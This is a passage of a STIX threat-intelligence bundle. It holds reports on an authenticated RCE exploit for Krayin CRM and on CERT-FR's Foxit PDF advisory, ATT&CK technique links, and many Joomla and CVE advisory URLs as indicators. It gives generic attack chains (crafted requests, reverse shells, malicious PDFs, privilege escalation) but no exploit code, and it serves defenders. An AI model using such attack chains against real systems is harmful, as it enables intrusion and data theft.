      "description": "## Overview\n\nA significant security vulnerability affecting Krayin CRM v2.2.x has been exposed with the publication of a public exploit on Exploit-DB (EDB-52629). This vulnerability enables an authenticated attacker to achieve Remote Code Execution (RCE) on the server hosting the CRM application. The presence of a readily available exploit means that the attack surface for Krayin CRM deployments is immediately escalated, presenting a critical risk to organizations using unpatched versions. Attackers leveraging this exploit can execute arbitrary commands, potentially leading to full system compromise, data exfiltration, or the deployment of further malicious payloads such as ransomware or backdoors. Defenders must prioritize patching and monitoring Krayin CRM instances.\n\n## Attack Chain\n\n1. An attacker obtains valid authentication credentials for a Krayin CRM v2.2.x instance through various means (e.g., brute-forcing, phishing, compromised accounts).\n2. The authenticated attacker crafts a malicious request leveraging the specific vulnerability (EDB-52629) within the Krayin CRM application.\n3. The Krayin CRM application processes the malicious input without proper sanitization or validation, allowing the injection of arbitrary commands.\n4. The injected commands are executed by the underlying operating system with the privileges of the web server process.\n5. The attacker gains initial code execution capabilities on the server, potentially allowing for the creation of web shells or reverse shells.\n6. The attacker escalates privileges or moves laterally within the network, aiming to achieve further compromise or exfiltrate sensitive data.\n\n## Impact\n\nSuccessful exploitation of this Authenticated Remote Code Execution vulnerability in Krayin CRM v2.2.x can lead to severe consequences. Organizations could face complete compromise of their CRM system and the underlying server. This includes unauthorized access to sensitive customer data, financial records, and proprietary business information. Attackers can deface websites, inject malware, establish persistent access, or pivot to other systems within the network. The integrity, confidentiality, and availability of critical business data can be severely impacted, leading to significant financial losses, reputational damage, and potential regulatory penalties.\n\n## Recommendation\n\n* Immediately patch all Krayin CRM v2.2.x installations to a version where this RCE vulnerability is remediated.\n* Implement web application firewall (WAF) rules to detect and block suspicious requests targeting Krayin CRM, especially those attempting command injection through known vulnerable parameters.\n* Enable comprehensive logging for web server access (category: webserver) and review logs for unusual requests containing command-line syntax or unexpected file uploads.\n* Monitor for suspicious process creation (category: process_creation) on servers hosting Krayin CRM that originate from the web server process, such as `cmd.exe`, `powershell.exe`, or scripting interpreters.\n",
      "published": "2026-07-08T13:45:13Z",
      "labels": [
        "webapps",
        "rce",
        "exploit-db",
        "krayin-crm",
        "crm"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/52629"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c7f59e8-82bf-57e8-bb68-80b7764d6c08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fd6ab6c-fc97-59d9-a59e-ee4f072ad5e4",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77f8b315-e261-5554-90f2-fb1eee6687b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fd6ab6c-fc97-59d9-a59e-ee4f072ad5e4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Automated Exfiltration",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1020",
          "url": "https://attack.mitre.org/techniques/T1020"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2c4e90fb-de1d-5a47-b2ad-ff2fd908153b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9fd6ab6c-fc97-59d9-a59e-ee4f072ad5e4",
      "target_ref": "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9fd6ab6c-fc97-59d9-a59e-ee4f072ad5e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities in Foxit PDF Editor and Reader",
      "description": "## Overview\n\nCERT-FR has issued an advisory regarding multiple critical vulnerabilities affecting Foxit PDF Editor and Reader products across both Windows and macOS platforms, initially identified on July 8, 2026. These vulnerabilities, including a range of CVEs such as CVE-2026-13126 through CVE-2026-13129 and CVE-2026-57237 through CVE-2026-57260, could be exploited by a remote attacker. The exploitation of these flaws could lead to severe consequences for affected users, including arbitrary code execution, unauthorized privilege escalation, and significant data confidentiality breaches. These vulnerabilities affect specific versions of PDF Editor (prior to 13.2.5, 14.0.5, and 2026.1.2) and PDF Reader (prior to 2026.1.2). For defenders, this means immediate patching of all vulnerable Foxit installations is crucial to prevent client-side compromise.\n\n## Attack Chain\n\n1. **Initial Access**: An attacker crafts a malicious PDF document designed to exploit one or more of the vulnerabilities (e.g., CVE-2026-13126). This document is typically delivered to a victim via email as an attachment or through a compromised website.\n2. **User Interaction**: The victim is enticed to open the malicious PDF document using their vulnerable Foxit PDF Editor or Reader application.\n3. **Vulnerability Trigger**: Upon opening the document, the parsing engine of the Foxit application encounters the malformed or specially crafted content within the PDF, triggering the underlying vulnerability (e.g., a heap buffer overflow, out-of-bounds write).\n4. **Arbitrary Code Execution**: Successful exploitation of the vulnerability leads to arbitrary code execution within the context of the vulnerable Foxit application, allowing the attacker to run their own malicious code.\n5. **Privilege Escalation**: If the initial code execution occurs in a low-privileged user context, the attacker may then leverage an additional privilege escalation vulnerability (e.g., CVE-2026-13128) to gain higher system privileges, such as SYSTEM on Windows or root on macOS.\n6. **Post-Exploitation**: With elevated privileges, the attacker can establish persistence, install additional malware (e.g., ransomware, wipers), exfiltrate sensitive data (e.g., CVE-2026-13129), or further compromise the affected system and potentially the network.\n\n## Impact\n\nThe successful exploitation of these numerous vulnerabilities can result in significant damage to an organization. Attackers can gain complete control over a user's workstation through arbitrary code execution, potentially leading to the deployment of ransomware or other destructive malware across the network. Privilege escalation allows an attacker to bypass security controls and access sensitive system resources. Furthermore, compromised data confidentiality can lead to the theft of intellectual property, personal identifiable information (PII), and other critical business data, incurring regulatory fines, reputational damage, and severe financial losses. While no specific victim counts or targeted sectors are mentioned, any organization utilizing vulnerable Foxit products is at risk.\n\n## Recommendation\n\n* Prioritize patching all affected Foxit products immediately by applying updates from the vendor's security bulletin at `https://www.foxitsoftware.com/support/security-bulletins.php`.\n* Ensure Foxit PDF Editor versions are updated to at least 13.2.5, 14.0.5, or 2026.1.2, and Foxit PDF Reader versions are updated to at least 2026.1.2.\n* Educate users on the risks of opening suspicious or untrusted PDF documents delivered via email or downloaded from unknown sources, as this is the likely initial access vector for CVE-2026-13126, CVE-2026-13127, CVE-2026-13128, CVE-2026-13129, and others.\n",
      "published": "2026-07-08T14:13:59Z",
      "labels": [
        "client-side-exploitation",
        "document-exploit",
        "pdf",
        "rce",
        "privilege-escalation",
        "data-exfiltration",
        "windows",
        "macos"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--08034fb1-a440-5817-bcb0-e93e68f47ade"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0845/"
        },
        {
          "source_name": "reference",
          "url": "https://www.foxitsoftware.com/support/security-bulletins.php"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13126"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13127"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13128"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13129"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57237"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57238"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57239"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57240"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57241"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57242"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57243"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57244"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57245"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57246"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57247"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57248"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57249"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57250"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57251"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57252"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57253"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57254"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57255"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57256"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57257"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57258"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57259"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-57260"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9b178f23-c7ff-592a-a854-dfc9099876e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1055-20260701-core-incorrect-access-control-in-com-media-webservice-endpoints.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1055-20260701-core-incorrect-access-control-in-com-media-webservice-endpoints.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ead9ea8e-264b-5d5c-9059-a18f65be6574",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--9b178f23-c7ff-592a-a854-dfc9099876e7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5d3fafe1-4acb-5f4f-bc4d-78f49a0b57e5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1056-20260702-core-incorrect-access-control-in-com-contact-vcf-download.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1056-20260702-core-incorrect-access-control-in-com-contact-vcf-download.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61b9f786-4456-526f-9910-d1005d480cf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--5d3fafe1-4acb-5f4f-bc4d-78f49a0b57e5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--09cf93b3-783f-588c-83c9-b69f4c93ad5d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1057-20260703-core-xss-in-mfa-method-management.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1057-20260703-core-xss-in-mfa-method-management.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4367db98-1468-5e9e-bf95-fdb62b2b7054",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--09cf93b3-783f-588c-83c9-b69f4c93ad5d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d14271f3-23ae-5945-bb09-de922b01b52f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1058-20260704-core-xss-in-com-templates.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1058-20260704-core-xss-in-com-templates.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--06f7561e-944c-5c5a-b9ba-e822d0ae0577",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--d14271f3-23ae-5945-bb09-de922b01b52f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e93d1caf-7f82-5e44-a6e8-43b5a67387ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1059-20260705-core-xss-in-various-modalreturn-layouts.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1059-20260705-core-xss-in-various-modalreturn-layouts.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2399e23b-2e5e-566b-aa94-2a6de82e1a3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--e93d1caf-7f82-5e44-a6e8-43b5a67387ea"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1947dd9f-9287-5b41-8a22-93e56c5c3372",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1060-20260706-core-xss-in-com-installer.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1060-20260706-core-xss-in-com-installer.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f9f94691-aa98-5505-b983-def4305a1543",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--1947dd9f-9287-5b41-8a22-93e56c5c3372"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f96fada8-6e84-5488-ad93-61865a85fba3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1061-20260707-core-xss-in-the-generic-image-output-layout.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1061-20260707-core-xss-in-the-generic-image-output-layout.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5240ed58-b93f-5b7f-a570-ef7f8eb50370",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--f96fada8-6e84-5488-ad93-61865a85fba3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--475dcbfe-8e0e-5148-8b64-4c0305cf71d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1062-20260708-core-xss-through-language-overrides.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1062-20260708-core-xss-through-language-overrides.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72ce25ba-31d8-504a-9fca-966ad00ab1d8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--475dcbfe-8e0e-5148-8b64-4c0305cf71d5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d396f039-82fe-5f7c-9056-fad983bed662",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1063-20260709-core-incorrect-access-control-in-com-workflow.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1063-20260709-core-incorrect-access-control-in-com-workflow.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--caf3c69c-9acf-5bb7-9f55-a24bbf57a322",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--d396f039-82fe-5f7c-9056-fad983bed662"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--717081e5-b821-5308-992d-480d352a851e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1064-20260710-core-incorrect-access-control-in-com-modules.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1064-20260710-core-incorrect-access-control-in-com-modules.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--de710d11-7cd1-5da3-9220-fe1840231db6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--717081e5-b821-5308-992d-480d352a851e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cfbcdf73-951b-57d6-b125-0a7a36cb0e13",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1065-20260711-core-incorrect-access-control-in-com-privacy-webservice-endpoints.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1065-20260711-core-incorrect-access-control-in-com-privacy-webservice-endpoints.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ff14ec9b-4ddb-58b3-95dc-6fef9a22477f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--cfbcdf73-951b-57d6-b125-0a7a36cb0e13"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3c88f8ac-7548-538a-89da-c8a44af44001",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://developer.joomla.org/security-centre/1066-20260712-core-incorrect-access-control-in-com-fields-webservice-endpoints.html",
      "pattern": "[url:value = 'https://developer.joomla.org/security-centre/1066-20260712-core-incorrect-access-control-in-com-fields-webservice-endpoints.html']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--573a0b44-5fc9-5c32-ac85-7dae26ae91ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--3c88f8ac-7548-538a-89da-c8a44af44001"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4a899f76-2f0d-56e5-935a-b4cca15a1461",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48947",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48947']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--962fdc59-b210-5f93-bda9-2d1cf9eef976",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--4a899f76-2f0d-56e5-935a-b4cca15a1461"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bae8a26a-0ee4-5f68-b3e6-6a91266eb66d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48948",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48948']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--277ab7e5-4e86-5426-b3cd-be923af09224",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--bae8a26a-0ee4-5f68-b3e6-6a91266eb66d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6f5dcf7b-3085-503e-b5c6-951596a92381",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48949",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48949']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--33a9812a-a8bd-5483-b854-d2f05a0572b6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--6f5dcf7b-3085-503e-b5c6-951596a92381"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--92a499af-75ea-54c9-b283-d1f34d93dc6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48950",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48950']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--84d1824f-837f-58c0-bfcb-fa9e0c1bb689",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--92a499af-75ea-54c9-b283-d1f34d93dc6a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f716d6d7-d937-5271-bc21-8c95fd00fe79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48951",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48951']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6ac41831-bc64-5560-b442-fa8ab726b45f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--f716d6d7-d937-5271-bc21-8c95fd00fe79"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9c64370d-a46a-5473-9872-b5151956567a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48952",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48952']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--73382e09-c4ef-55dd-880c-4adea8b77ade",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--9c64370d-a46a-5473-9872-b5151956567a"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b3610ad1-5d5f-5985-8a26-19c99ad4d55c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48953",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48953']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--111eada4-461d-548a-b5c0-3c5168541926",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--b3610ad1-5d5f-5985-8a26-19c99ad4d55c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--31e6c983-a8b6-5998-a9c7-b8fa9dc75c69",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48954",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48954']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--71d54925-a478-504c-b31e-6d7bc71192f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--31e6c983-a8b6-5998-a9c7-b8fa9dc75c69"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--de71f0b5-b89d-5587-9f0d-3518d85828c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-48955",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-48955']",
      "pattern_type": "stix",
      "valid_from": "2026-07-08T14:15:17Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15fc8335-46b0-5b6a-8066-5f72ef1c4f65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--280f8811-2436-5330-9b16-575528fdcf46",
      "target_ref": "indicator--de71f0b5-b89d-5587-9f0d-3518d85828c7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1e4abd2c-af24-554c-9841-bd0e6fad3773",
